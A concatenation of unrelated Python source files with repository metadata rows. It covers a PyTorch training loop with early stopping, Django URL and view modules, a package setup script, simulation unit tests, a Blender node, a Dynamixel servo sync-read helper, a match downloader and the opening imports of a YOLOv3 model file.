                'test_fc': fc}
        else:
            raise ValueError("%s is an invalid data type" % dtype)

        return metric_row
class EarlyStopping(object):
    """Stop training when a monitored quantity has stopped improving.

    Keeps a rolling window of the most recent validation losses; training is flagged to
    stop once the window-smoothed loss stops decreasing, but never before both the
    minimum-epoch and window-fill requirements are met.
    """

    def __init__(self, history=10, min_epochs=10):
        """
        Parameters
        ----------
        history : :obj:`int`
            number of previous checks to average over when checking for increase in loss
        min_epochs : :obj:`int`
            minimum number of epochs for training

        """
        self.history = history
        self.min_epochs = min_epochs

        # rolling buffer of the `history` most recent losses; NaN = not yet filled
        self.prev_losses = np.full(self.history, fill_value=np.nan)
        self.best_epoch = 0
        self.best_loss = np.inf
        self.stopped_epoch = 0
        self.should_stop = False

    def on_val_check(self, epoch, curr_loss):
        """Check to see if loss has begun to increase on validation data for current epoch.

        Rather than returning the results of the check, this method updates the class attribute
        :obj:`should_stop`, which is checked externally by the fitting function.

        Parameters
        ----------
        epoch : :obj:`int`
            current epoch
        curr_loss : :obj:`float`
            current loss

        """
        # smoothed loss before and after folding in the newest value
        smoothed_before = np.nanmean(self.prev_losses)
        self.prev_losses = np.roll(self.prev_losses, 1)
        self.prev_losses[0] = curr_loss
        smoothed_after = np.nanmean(self.prev_losses)

        # track the single best loss and the epoch it occurred at
        if curr_loss < self.best_loss:
            self.best_loss = curr_loss
            self.best_epoch = epoch

        # stop once past warm-up and the smoothed loss is no longer decreasing
        warmup = max(self.min_epochs, self.history)
        if epoch > warmup and smoothed_after >= smoothed_before:
            print('\n== early stopping criteria met; exiting train loop ==')
            print('training epochs: %d' % epoch)
            print('end cost: %04f' % curr_loss)
            print('best epoch: %i' % self.best_epoch)
            print('best cost: %04f\n' % self.best_loss)
            self.stopped_epoch = epoch
            self.should_stop = True
def fit(hparams, model, data_generator, exp, method='ae'):
    """Fit pytorch models with stochastic gradient descent and early stopping.

    Training parameters such as min epochs, max epochs, and early stopping hyperparameters are
    specified in :obj:`hparams`.

    For more information on how model losses are calculated, see the classes that inherit from
    :class:`FitMethod`.

    For more information on how early stopping is implemented, see the class
    :class:`EarlyStopping`.

    Training progess is monitored by calculating the model loss on both training data and
    validation data. The training loss is calculated each epoch, and the validation loss is
    calculated according to the :obj:`hparams` key :obj:`'val_check_interval'`. For example, if
    :obj:`val_check_interval=5` then the validation loss is calculated every 5 epochs. If
    :obj:`val_check_interval=0.5` then the validation loss is calculated twice per epoch - after
    the first half of the batches have been processed, then again after all batches have been
    processed.

    Monitored metrics are saved in a csv file in the model directory. This logging is handled by
    the :obj:`testtube` package.

    At the end of training, model outputs (such as latents for autoencoder models, or predictions
    for decoder models) can optionally be computed and saved using the :obj:`hparams` keys
    :obj:`'export_latents'` or :obj:`'export_predictions'`, respectively.

    Parameters
    ----------
    hparams : :obj:`dict`
        model/training specification
    model : :obj:`PyTorch` model
        model to fit
    data_generator : :obj:`ConcatSessionsGenerator` object
        data generator to serve data batches
    exp : :obj:`test_tube.Experiment` object
        for logging training progress
    method : :obj:`str`
        specifies the type of loss - 'ae' | 'nll'

    """
    # check inputs
    if method == 'ae':
        loss = AELoss(model, n_datasets=data_generator.n_datasets)
    elif method == 'nll':
        loss = NLLLoss(model, n_datasets=data_generator.n_datasets)
    else:
        raise ValueError('"%s" is an invalid fitting method' % method)

    # optimizer set-up
    optimizer = torch.optim.Adam(
        loss.get_parameters(), lr=hparams['learning_rate'], weight_decay=hparams.get('l2_reg', 0),
        amsgrad=True)

    # enumerate batches on which validation metrics should be recorded
    best_val_loss = np.inf
    best_val_epoch = None
    best_val_model = None
    val_check_batch = np.linspace(
        data_generator.n_tot_batches['train'] * hparams['val_check_interval'],
        data_generator.n_tot_batches['train'] * (hparams['max_n_epochs']+1),
        int((hparams['max_n_epochs'] + 1) / hparams['val_check_interval'])).astype('int')

    # early stopping set-up
    if hparams['enable_early_stop']:
        early_stop = EarlyStopping(
            history=hparams['early_stop_history'], min_epochs=hparams['min_n_epochs'])
    else:
        early_stop = None

    i_epoch = 0
    for i_epoch in range(hparams['max_n_epochs'] + 1):
        # Note: the 0th epoch has no training (randomly initialized model is evaluated) so we cycle
        # through `max_n_epochs` training epochs

        # zero-pad the epoch counter in the progress printout to match max_n_epochs width
        if hparams['max_n_epochs'] < 10:
            print('epoch %i/%i' % (i_epoch, hparams['max_n_epochs']))
        elif hparams['max_n_epochs'] < 100:
            print('epoch %02i/%02i' % (i_epoch, hparams['max_n_epochs']))
        elif hparams['max_n_epochs'] < 1000:
            print('epoch %03i/%03i' % (i_epoch, hparams['max_n_epochs']))
        elif hparams['max_n_epochs'] < 10000:
            print('epoch %04i/%04i' % (i_epoch, hparams['max_n_epochs']))
        elif hparams['max_n_epochs'] < 100000:
            print('epoch %05i/%05i' % (i_epoch, hparams['max_n_epochs']))
        else:
            print('epoch %i/%i' % (i_epoch, hparams['max_n_epochs']))

        # control how data is batched to that models can be restarted from a particular epoch
        torch.manual_seed(i_epoch)  # order of trials within sessions
        np.random.seed(i_epoch)  # order of sessions

        loss.reset_metrics('train')
        data_generator.reset_iterators('train')

        for i_train in tqdm(range(data_generator.n_tot_batches['train'])):

            model.train()

            # zero out gradients. Don't want gradients from previous iterations
            optimizer.zero_grad()

            # get next minibatch and put it on the device
            data, dataset = data_generator.next_batch('train')

            # call the appropriate loss function
            loss.calc_loss(data, dataset=dataset)
            loss.update_metrics('train', dataset=dataset)

            # step (evaluate untrained network on epoch 0)
            if i_epoch > 0:
                optimizer.step()

            # check validation according to schedule
            curr_batch = (i_train + 1) + i_epoch * data_generator.n_tot_batches['train']
            if np.any(curr_batch == val_check_batch):

                loss.reset_metrics('val')
                data_generator.reset_iterators('val')
                model.eval()

                for i_val in range(data_generator.n_tot_batches['val']):
                    # get next minibatch and put it on the device
                    data, dataset = data_generator.next_batch('val')

                    # call the appropriate loss function
                    loss.calc_loss(data, dataset=dataset)
                    loss.update_metrics('val', dataset=dataset)

                # save best val model
                if loss.get_loss('val') < best_val_loss:
                    best_val_loss = loss.get_loss('val')
                    filepath = os.path.join(
                        hparams['expt_dir'], 'version_%i' % exp.version, 'best_val_model.pt')
                    torch.save(model.state_dict(), filepath)

                    # hparams are stripped before deepcopy, then restored on both copies
                    model.hparams = None
                    best_val_model = copy.deepcopy(model)
                    model.hparams = hparams
                    best_val_model.hparams = hparams
                    best_val_epoch = i_epoch

                # export aggregated metrics on train/val data
                exp.log(loss.create_metric_row(
                    'train', i_epoch, i_train, -1, trial=-1,
                    by_dataset=False, best_epoch=best_val_epoch))
                exp.log(loss.create_metric_row(
                    'val', i_epoch, i_train, -1, trial=-1,
                    by_dataset=False, best_epoch=best_val_epoch))
                # export individual session metrics on train/val data
                if data_generator.n_datasets > 1:
                    for dataset in range(data_generator.n_datasets):
                        exp.log(loss.create_metric_row(
                            'train', i_epoch, i_train, dataset, trial=-1,
                            by_dataset=True, best_epoch=best_val_epoch))
                        exp.log(loss.create_metric_row(
                            'val', i_epoch, i_train, dataset, trial=-1,
                            by_dataset=True, best_epoch=best_val_epoch))
                exp.save()

            elif (i_train + 1) % data_generator.n_tot_batches['train'] == 0:
                # export training metrics at end of epoch
                # export aggregated metrics on train/val data
                exp.log(loss.create_metric_row(
                    'train', i_epoch, i_train, -1, trial=-1,
                    by_dataset=False, best_epoch=best_val_epoch))
                # export individual session metrics on train/val data
                if data_generator.n_datasets > 1:
                    for dataset in range(data_generator.n_datasets):
                        exp.log(loss.create_metric_row(
                            'train', i_epoch, i_train, dataset, trial=-1,
                            by_dataset=True, best_epoch=best_val_epoch))
                exp.save()

        if hparams['enable_early_stop']:
            early_stop.on_val_check(i_epoch, loss.get_loss('val'))
            if early_stop.should_stop:
                break

    # save out last model
    if hparams.get('save_last_model', False):
        filepath = os.path.join(hparams['expt_dir'], 'version_%i' % exp.version, 'last_model.pt')
        torch.save(model.state_dict(), filepath)

    # compute test loss
    if method == 'ae':
        test_loss = AELoss(best_val_model, n_datasets=data_generator.n_datasets)
    elif method == 'nll':
        test_loss = NLLLoss(best_val_model, n_datasets=data_generator.n_datasets)
    else:
        raise ValueError('"%s" is an invalid fitting method' % method)

    test_loss.reset_metrics('test')
    data_generator.reset_iterators('test')
    best_val_model.eval()

    for i_test in range(data_generator.n_tot_batches['test']):
        # get next minibatch and put it on the device
        data, dataset = data_generator.next_batch('test')

        # call the appropriate loss function
        test_loss.reset_metrics('test')
        test_loss.calc_loss(data, dataset=dataset)
        test_loss.update_metrics('test', dataset=dataset)

        # calculate metrics for each *batch* (rather than whole dataset)
        exp.log(test_loss.create_metric_row(
            'test', i_epoch, i_test, dataset, trial=data['batch_idx'].item(), by_dataset=True))
    exp.save()

    # export latents
    if method == 'ae' and hparams['export_latents']:
        print('exporting latents')
        export_latents(data_generator, best_val_model)
    elif method == 'nll' and hparams['export_predictions']:
        print('exporting predictions')
        export_predictions(data_generator, best_val_model)
| 38.641096 | 99 | 0.571185 |
5f347a2f6bcf51d12bb68330a9cb5638158188ce | 1,988 | py | Python | events/urls.py | jdevera/pythoncanarias_web | 465e8b0a054726e29b1029f1dffe11f913e40bcc | [
"MIT"
] | null | null | null | events/urls.py | jdevera/pythoncanarias_web | 465e8b0a054726e29b1029f1dffe11f913e40bcc | [
"MIT"
] | null | null | null | events/urls.py | jdevera/pythoncanarias_web | 465e8b0a054726e29b1029f1dffe11f913e40bcc | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
# Namespace for reversing URLs, e.g. reverse('events:detail_event', ...)
app_name = 'events'

urlpatterns = [
    # Event listing and detail pages
    path('', views.index, name='index'),
    path('archive/', views.past_events, name='past_events'),
    path('<slug:slug>/', views.detail_event, name='detail_event'),
    # Waiting list sign-up and confirmation
    path(
        '<slug:slug>/waiting-list/',
        views.waiting_list,
        name='waiting_list',
    ),
    path(
        '<slug:slug>/waiting-list/accepted/',
        views.waiting_list_accepted,
        name='waiting_list_accepted',
    ),
    # Ticket refunds
    path(
        '<slug:slug>/refund/',
        views.refund,
        name='refund',
    ),
    path(
        '<slug:slug>/refund/accepted/<int:pk>/',
        views.refund_accepted,
        name='refund_accepted',
    ),
    # Ticket trade between two attendees, identified by their ticket UUIDs
    path(
        '<slug:slug>/trade/<uuid:sell_code>/<uuid:buy_code>/',
        views.trade,
        name='trade',
    ),
    # Re-sending ticket emails
    path(
        '<slug:slug>/resend_ticket/',
        views.resend_ticket,
        name='resend_ticket',
    ),
    path(
        '<slug:slug>/resend_ticket/confirmation',
        views.resend_confirmation,
        name='resend_confirmation',
    ),
    # Ticket purchase flow (with and without credit card)
    path('<slug:slug>/buy/', views.buy_ticket, name='buy_ticket'),
    path(
        'ticket/purchase/bought/<int:id_article>/',
        views.article_bought,
        name='article_bought',
    ),
    path(
        'ticket/purchase/<int:id_article>/',
        views.ticket_purchase,
        name='ticket_purchase',
    ),
    path(
        'ticket/purchase/<int:id_article>/nocc/',  # no credit card
        views.ticket_purchase_nocc,
        name='ticket_purchase_nocc',
    ),
    # Raffle pages: draw, per-gift views, and results
    path('<slug:slug>/raffle/', views.raffle, name='raffle'),
    path('<slug:slug>/raffle/<int:gift_id>/',
         views.raffle_gift,
         name='raffle_gift'),
    path('<slug:slug>/raffle/<int:gift_id>/match/',
         views.raffle_gift, {'match': True},
         name='raffle_gift_match'),
    path('<slug:slug>/raffle/results/',
         views.raffle_results,
         name='raffle_results'),
]
0c15e1fec2ec062eb7cfbbc333f94cae23814e44 | 1,974 | py | Python | setup.py | csinva/interpretability-implementations-demos | 0223114225d0e077007b1ad49f63b64f3ff5ee15 | [
"MIT"
] | 102 | 2019-07-16T13:45:35.000Z | 2020-09-14T19:12:49.000Z | setup.py | csinva/interpretability-implementations-demos | 0223114225d0e077007b1ad49f63b64f3ff5ee15 | [
"MIT"
] | 2 | 2020-01-03T20:47:14.000Z | 2020-01-03T21:17:39.000Z | setup.py | csinva/interpretability-implementations-demos | 0223114225d0e077007b1ad49f63b64f3ff5ee15 | [
"MIT"
] | 8 | 2019-08-09T08:40:34.000Z | 2020-09-06T17:51:10.000Z | from os import path
import setuptools
# Long description for PyPI is taken verbatim from the repo readme.
path_to_repo = path.abspath(path.dirname(__file__))
with open(path.join(path_to_repo, 'readme.md'), encoding='utf-8') as f:
    long_description = f.read()

# Runtime dependencies installed with the package.
required_pypi = [
    'matplotlib',
    'mlxtend>=0.18.0',  # some lower version are missing fpgrowth
    'numpy',
    'pandas',
    'requests',  # used in c4.5
    'scipy',
    'scikit-learn',  # 0.23+ only works on py3.6+
    'tqdm',  # used in BART
]

# NOTE(review): extra_deps is defined but never passed to setup() (e.g. via
# extras_require) — confirm whether these optional dependencies should be wired in.
extra_deps = [
    'cvxpy',  # optionally requires cvxpy for slim
    'corels',  # optinally requires corels for optimalrulelistclassifier
    'gosdt-deprecated',  # optionally requires gosdt for optimaltreeclassifier
    'irf',  # optionally require irf for iterativeRandomForestClassifier
]

setup(
    name="imodels",
    version="1.3.0",
    author="Chandan Singh, Keyan Nasseri, Bin Yu, and others",
    author_email="chandan_singh@berkeley.edu",
    description="Implementations of various interpretable models",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/csinva/imodels",
    packages=setuptools.find_packages(
        exclude=['tests', 'tests.*', '*.test.*']
    ),
    install_requires=required_pypi,
    # Development-only extras: install with `pip install imodels[dev]`.
    extras_require={
        'dev': [
            'dvu',
            'gdown',
            # 'irf',
            'jupyter',
            'jupytext',
            'matplotlib',
            # 'pdoc3', # for building docs
            'pytest',
            'pytest-cov',
            # 'seaborn', # in bartpy.diagnostics.features
            'slurmpy',
            # 'statsmodels', # in bartpy.diagnostics.diagnostics
            # 'torch', # for neural-net-integrated models
            'tqdm',
            'pmlb',
        ]
    },
    python_requires='>=3.6',
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
) if False else setuptools.setup(
    name="imodels",
    version="1.3.0",
    author="Chandan Singh, Keyan Nasseri, Bin Yu, and others",
    author_email="chandan_singh@berkeley.edu",
    description="Implementations of various interpretable models",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/csinva/imodels",
    packages=setuptools.find_packages(
        exclude=['tests', 'tests.*', '*.test.*']
    ),
    install_requires=required_pypi,
    # Development-only extras: install with `pip install imodels[dev]`.
    extras_require={
        'dev': [
            'dvu',
            'gdown',
            # 'irf',
            'jupyter',
            'jupytext',
            'matplotlib',
            # 'pdoc3', # for building docs
            'pytest',
            'pytest-cov',
            # 'seaborn', # in bartpy.diagnostics.features
            'slurmpy',
            # 'statsmodels', # in bartpy.diagnostics.diagnostics
            # 'torch', # for neural-net-integrated models
            'tqdm',
            'pmlb',
        ]
    },
    python_requires='>=3.6',
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)
| 29.909091 | 78 | 0.600811 |
0807fc13281b87d5c31d3f421ab66143a267bffa | 1,165 | py | Python | app/views.py | LogicPi-cn/django-dashboard-material | 7be3abef34e809ee12ed14d4a65df2e12008d485 | [
"MIT"
] | null | null | null | app/views.py | LogicPi-cn/django-dashboard-material | 7be3abef34e809ee12ed14d4a65df2e12008d485 | [
"MIT"
] | null | null | null | app/views.py | LogicPi-cn/django-dashboard-material | 7be3abef34e809ee12ed14d4a65df2e12008d485 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404, redirect
from django.template import loader
from django.http import HttpResponse
from django import template
@login_required(login_url="/login/")
def index(request):
    """Render the dashboard landing page for authenticated users."""
    template_name = "index.html"
    return render(request, template_name)
@login_required(login_url="/login/")
def pages(request):
    """Serve a static HTML template named by the last segment of the URL.

    All resource paths end in .html: the template name is taken directly from the
    request path. Unknown templates render the 404 page; any other rendering error
    renders the 500 page.
    """
    context = {}
    try:
        load_template = request.path.split('/')[-1]
        html_template = loader.get_template(load_template)
        return HttpResponse(html_template.render(context, request))
    except template.TemplateDoesNotExist:
        html_template = loader.get_template('error-404.html')
        return HttpResponse(html_template.render(context, request))
    except Exception:
        # was a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt;
        # catching Exception keeps the 500-page fallback without hiding interrupts
        html_template = loader.get_template('error-500.html')
        return HttpResponse(html_template.render(context, request))
| 31.486486 | 72 | 0.684979 |
3d42cf5e5530798f060c4d9a4855cb05c43d9438 | 3,251 | py | Python | _unittest/test_09_Primitives2D.py | pyansys/pyaedt | c7b045fede6bc707fb20a8db7d5680c66d8263f6 | [
"MIT"
] | 38 | 2021-10-01T23:15:26.000Z | 2022-03-30T18:14:41.000Z | _unittest/test_09_Primitives2D.py | pyansys/pyaedt | c7b045fede6bc707fb20a8db7d5680c66d8263f6 | [
"MIT"
] | 362 | 2021-09-30T17:11:55.000Z | 2022-03-31T13:36:20.000Z | _unittest/test_09_Primitives2D.py | pyansys/pyaedt | c7b045fede6bc707fb20a8db7d5680c66d8263f6 | [
"MIT"
] | 15 | 2021-09-30T20:21:02.000Z | 2022-02-21T20:22:03.000Z | #!/ekm/software/anaconda3/bin/python
# Import required modules
from _unittest.conftest import BasisTest
from pyaedt import Maxwell2d
from pyaedt.modeler.Primitives import Polyline
# Setup paths for module imports
try:
import pytest # noqa: F401
except ImportError:
import _unittest_ironpython.conf_unittest as pytest # noqa: F401
class TestClass(BasisTest, object):
    """Tests for 2D primitive creation in a Maxwell 2D (TransientXY) design."""

    def setup_class(self):
        # one shared Maxwell2d app/design for all tests in this class
        BasisTest.my_setup(self)
        self.aedtapp = BasisTest.add_app(
            self, design_name="2D_Primitives", solution_type="TransientXY", application=Maxwell2d
        )

    def teardown_class(self):
        BasisTest.my_teardown(self)

    def create_rectangle(self, name=None):
        """Helper: (re)create a rectangle with the given name and return its object."""
        if not name:
            name = "MyRectangle"
        # delete any leftover object from a previous run so creation is deterministic
        if self.aedtapp.modeler[name]:
            self.aedtapp.modeler.delete(name)
        o = self.aedtapp.modeler.create_rectangle([5, 3, 0], [4, 5], name=name)
        return o

    def test_02_create_primitive(self):
        udp = self.aedtapp.modeler.Position(0, 0, 0)
        o = self.aedtapp.modeler.create_rectangle(udp, [5, 3], name="Rectangle1", matname="copper")
        assert isinstance(o.id, int)
        assert o.solve_inside

    def test_03_create_circle(self):
        udp = self.aedtapp.modeler.Position(0, 0, 0)
        # second circle uses a non-zero number of segments (8)
        o1 = self.aedtapp.modeler.create_circle(udp, 3, 0, name="Circle1", matname="copper")
        assert isinstance(o1.id, int)
        o2 = self.aedtapp.modeler.create_circle(udp, 3, 8, name="Circle2", matname="copper")
        assert isinstance(o2.id, int)

    def test_04_create_ellipse(self):
        udp = self.aedtapp.modeler.Position(0, 0, 0)
        o = self.aedtapp.modeler.create_ellipse(udp, 3, 2, name="Ellipse1", matname="copper")
        assert isinstance(o.id, int)

    def test_05_create_poly(self):
        udp = [self.aedtapp.modeler.Position(0, 0, 0), self.aedtapp.modeler.Position(10, 5, 0)]
        o = self.aedtapp.modeler.create_polyline(udp, name="Ellipse1", matname="copper")
        assert isinstance(o, Polyline)

    def test_chamfer_vertex(self):
        # smoke test only: passes if chamfer() does not raise
        o = self.create_rectangle("Rectangle1")
        o.vertices[0].chamfer()

    def test_fillet_vertex(self):
        # smoke test only: passes if fillet() does not raise
        o = self.create_rectangle("Rectangle1")
        o.vertices[0].fillet()

    def test_06_create_region(self):
        if self.aedtapp.modeler["Region"]:
            self.aedtapp.modeler.delete("Region")
        assert "Region" not in self.aedtapp.modeler.object_names
        region = self.aedtapp.modeler.create_region([100, 100, 100, 100])
        assert region.solve_inside
        assert region.model
        assert region.display_wireframe
        assert region.object_type == "Sheet"
        assert region.solve_inside
        # a 2D region accepts only 4 padding values; 6 values must fail
        region = self.aedtapp.modeler.create_region([100, 100, 100, 100, 100, 100])
        assert not region

    def test_07_assign_material_ceramic(self, material="Ceramic_material"):
        self.aedtapp.assign_material(["Rectangle1"], material)
        assert self.aedtapp.modeler["Rectangle1"].material_name == material

    def test_07_assign_material(self, material="steel_stainless"):
        self.aedtapp.assign_material(["Rectangle1"], material)
        assert self.aedtapp.modeler["Rectangle1"].material_name == material
cf42f7d201fac765dcba0fccb1122c5047e16af0 | 974 | py | Python | nodes/new_nodes/ObjectDisplay.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | nodes/new_nodes/ObjectDisplay.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | nodes/new_nodes/ObjectDisplay.py | kant/RenderStackNode | 19876fc75a03edf36ae27837d193509907adbd4a | [
"Apache-2.0"
] | null | null | null | import bpy
from bpy.props import *
from ...nodes.BASE.node_tree import RenderStackNode
class RenderNodeObjectDisplay(RenderStackNode):
    """Node that drives an object's viewport/render visibility from its sockets."""

    bl_idname = 'RenderNodeObjectDisplay'
    bl_label = 'Object Display +'

    def init(self, context):
        # input sockets: target object plus the two visibility flags
        for socket_type, prop_name, label in (
                ('RenderNodeSocketObject', 'object', 'Object'),
                ('RenderNodeSocketBool', 'hide_viewport', 'Hide Viewport'),
                ('RenderNodeSocketBool', 'hide_render', 'Hide Render'),
        ):
            self.create_prop(socket_type, prop_name, label)
        self.outputs.new('RSNodeSocketTaskSettings', "Settings")
        self.width = 175

    def process(self):
        self.store_data()
        target = self.node_dict['object']
        if not target:
            return
        # push the socket values onto the object's visibility attributes
        self.compare(target, 'hide_viewport', self.node_dict['hide_viewport'])
        self.compare(target, 'hide_render', self.node_dict['hide_render'])
def register():
    # Blender add-on hook: register the node class with bpy.
    bpy.utils.register_class(RenderNodeObjectDisplay)
def unregister():
bpy.utils.unregister_class(RenderNodeObjectDisplay)
| 28.647059 | 82 | 0.694045 |
d4071f8109a219f65689e15a1bccaeb93eaa3aff | 4,668 | py | Python | build/dynamixel_sdk/catkin_generated/installspace/group_sync_read.py | sej0015/holonomic_turtle_bot | 4cc80bb27dfce0aa6f2bd975d79f6348acf40401 | [
"Apache-2.0"
] | null | null | null | build/dynamixel_sdk/catkin_generated/installspace/group_sync_read.py | sej0015/holonomic_turtle_bot | 4cc80bb27dfce0aa6f2bd975d79f6348acf40401 | [
"Apache-2.0"
] | null | null | null | build/dynamixel_sdk/catkin_generated/installspace/group_sync_read.py | sej0015/holonomic_turtle_bot | 4cc80bb27dfce0aa6f2bd975d79f6348acf40401 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
################################################################################
# Copyright 2017 ROBOTIS CO., LTD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
# Author: Ryu Woon Jung (Leon)
from .robotis_def import *
class GroupSyncRead:
    """Protocol 2.0 "sync read" helper: read the same register block
    (start_address, data_length) from several Dynamixel IDs in a single
    bus transaction.

    Every method returns early / reports unavailable under Protocol 1.0,
    which has no sync-read instruction.
    """

    def __init__(self, port, ph, start_address, data_length):
        # port: PortHandler for the serial bus; ph: PacketHandler (protocol impl).
        self.port = port
        self.ph = ph
        self.start_address = start_address
        self.data_length = data_length
        self.last_result = False       # True once rxPacket() succeeded for all IDs
        self.is_param_changed = False  # set when the ID set changes; triggers makeParam()
        self.param = []                # flat TX parameter list (the registered IDs)
        self.data_dict = {}            # dxl_id -> raw bytes read back

        self.clearParam()

    def makeParam(self):
        """Rebuild the TX parameter list from the registered IDs."""
        if self.ph.getProtocolVersion() == 1.0:
            return
        if not self.data_dict:  # len(self.data_dict.keys()) == 0:
            return
        self.param = []
        for dxl_id in self.data_dict:
            self.param.append(dxl_id)

    def addParam(self, dxl_id):
        """Register an ID for the next sync read; False if already registered."""
        if self.ph.getProtocolVersion() == 1.0:
            return False
        if dxl_id in self.data_dict:  # dxl_id already exist
            return False
        self.data_dict[dxl_id] = []  # [0] * self.data_length
        self.is_param_changed = True
        return True

    def removeParam(self, dxl_id):
        """Unregister an ID; silently ignores unknown IDs."""
        if self.ph.getProtocolVersion() == 1.0:
            return
        if dxl_id not in self.data_dict:  # NOT exist
            return
        del self.data_dict[dxl_id]
        self.is_param_changed = True

    def clearParam(self):
        """Drop every registered ID (and any data read for it)."""
        if self.ph.getProtocolVersion() == 1.0:
            return
        self.data_dict.clear()

    def txPacket(self):
        """Transmit the sync-read instruction; returns a COMM_* status code."""
        if self.ph.getProtocolVersion() == 1.0 or len(self.data_dict.keys()) == 0:
            return COMM_NOT_AVAILABLE
        if self.is_param_changed is True or not self.param:
            self.makeParam()
        return self.ph.syncReadTx(self.port, self.start_address, self.data_length, self.param,
                                  len(self.data_dict.keys()) * 1)

    def rxPacket(self):
        """Collect one status response per registered ID.

        Stops at the first failing ID and returns its status code;
        self.last_result becomes True only when every read succeeded.
        """
        self.last_result = False
        if self.ph.getProtocolVersion() == 1.0:
            return COMM_NOT_AVAILABLE
        result = COMM_RX_FAIL
        if len(self.data_dict.keys()) == 0:
            return COMM_NOT_AVAILABLE
        for dxl_id in self.data_dict:
            self.data_dict[dxl_id], result, _ = self.ph.readRx(self.port, dxl_id, self.data_length)
            if result != COMM_SUCCESS:
                return result
        if result == COMM_SUCCESS:
            self.last_result = True
        return result

    def txRxPacket(self):
        """Convenience wrapper: txPacket() followed by rxPacket()."""
        if self.ph.getProtocolVersion() == 1.0:
            return COMM_NOT_AVAILABLE
        result = self.txPacket()
        if result != COMM_SUCCESS:
            return result
        return self.rxPacket()

    def isAvailable(self, dxl_id, address, data_length):
        """True when the last read succeeded and [address, address+data_length)
        lies inside the block fetched for dxl_id."""
        if self.ph.getProtocolVersion() == 1.0 or self.last_result is False or dxl_id not in self.data_dict:
            return False
        if (address < self.start_address) or (self.start_address + self.data_length - data_length < address):
            return False
        return True

    def getData(self, dxl_id, address, data_length):
        """Return 1-, 2- or 4-byte data previously read from dxl_id.

        Consecutive bytes are combined via DXL_MAKEWORD / DXL_MAKEDWORD
        (the byte at the lower address is passed first). Returns 0 when
        the data is unavailable or data_length is unsupported.
        """
        if not self.isAvailable(dxl_id, address, data_length):
            return 0
        if data_length == 1:
            return self.data_dict[dxl_id][address - self.start_address]
        elif data_length == 2:
            return DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address],
                                self.data_dict[dxl_id][address - self.start_address + 1])
        elif data_length == 4:
            return DXL_MAKEDWORD(DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address + 0],
                                              self.data_dict[dxl_id][address - self.start_address + 1]),
                                 DXL_MAKEWORD(self.data_dict[dxl_id][address - self.start_address + 2],
                                              self.data_dict[dxl_id][address - self.start_address + 3]))
        else:
            return 0
| 31.972603 | 109 | 0.582905 |
502cdaeb8e282b1a66d3c63cf4ad3d14b7a247a3 | 992 | py | Python | src/match_downloader.py | mnuyens/forseti2 | 3c6d76ffac2b64d51f03d3922e3b388a4e35f1a8 | [
"Apache-2.0"
] | 1 | 2015-03-07T04:48:53.000Z | 2015-03-07T04:48:53.000Z | src/match_downloader.py | mnuyens/forseti2 | 3c6d76ffac2b64d51f03d3922e3b388a4e35f1a8 | [
"Apache-2.0"
] | null | null | null | src/match_downloader.py | mnuyens/forseti2 | 3c6d76ffac2b64d51f03d3922e3b388a4e35f1a8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2.7
from __future__ import print_function
import urllib
import argparse
import json
import os.path
match_dir = '../matches'
def main():
    """Download consecutive match records starting at ``--start`` until the
    API stops reporting success, saving each one under ``match_dir``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('--start', type=int, action='store')
    args = parser.parse_args()

    # Hoisted out of the loop: the URL template never changes.
    target_base = 'https://pioneers.berkeley.edu/match_schedule/api/match/{}/'

    match_exists = True
    i = args.start
    while match_exists:
        print('Getting', i)
        url = target_base.format(i)
        try:
            f = urllib.urlopen(url)
            try:
                data = f.read()
            finally:
                # Close the HTTP response explicitly -- the original leaked it.
                f.close()
            obj = json.loads(data)
            match_exists = obj.get(u'message', None) == u'success'
            if match_exists:
                with open(os.path.join(match_dir, '{}.match'.format(i)), 'w') as wfile:
                    wfile.write(data)
        except Exception as ex:
            # NOTE(review): a failed query leaves match_exists True, so the loop
            # keeps probing the next id indefinitely during a persistent outage.
            # Kept as-is (looks like deliberate skip-and-continue) -- confirm.
            print("Couldn't query", url, "got", ex)
        i += 1


if __name__ == '__main__':
    main()
| 27.555556 | 87 | 0.584677 |
706ea20e12f4787d581136e57f4c5e1bb6be267d | 12,102 | py | Python | models/yolo.py | bhecquet/image-fields-detector | bdb290df43dd4401ab501c3e87eddf6e69a201cc | [
"Apache-2.0"
] | null | null | null | models/yolo.py | bhecquet/image-fields-detector | bdb290df43dd4401ab501c3e87eddf6e69a201cc | [
"Apache-2.0"
] | null | null | null | models/yolo.py | bhecquet/image-fields-detector | bdb290df43dd4401ab501c3e87eddf6e69a201cc | [
"Apache-2.0"
] | 1 | 2021-12-27T15:03:37.000Z | 2021-12-27T15:03:37.000Z | # YOLOv3 YOLO-specific modules
import argparse
import logging
import sys
from copy import deepcopy
sys.path.append('./') # to run '$ python *.py' files in subdirectories
logger = logging.getLogger(__name__)
from models.common import *
from models.experimental import *
from utils.autoanchor import check_anchor_order
from utils.general import make_divisible, check_file, set_logging
from utils.torch_utils import time_synchronized, fuse_conv_and_bn, model_info, scale_img, initialize_weights, \
select_device, copy_attr
try:
    import thop  # for FLOPS computation
except ImportError:
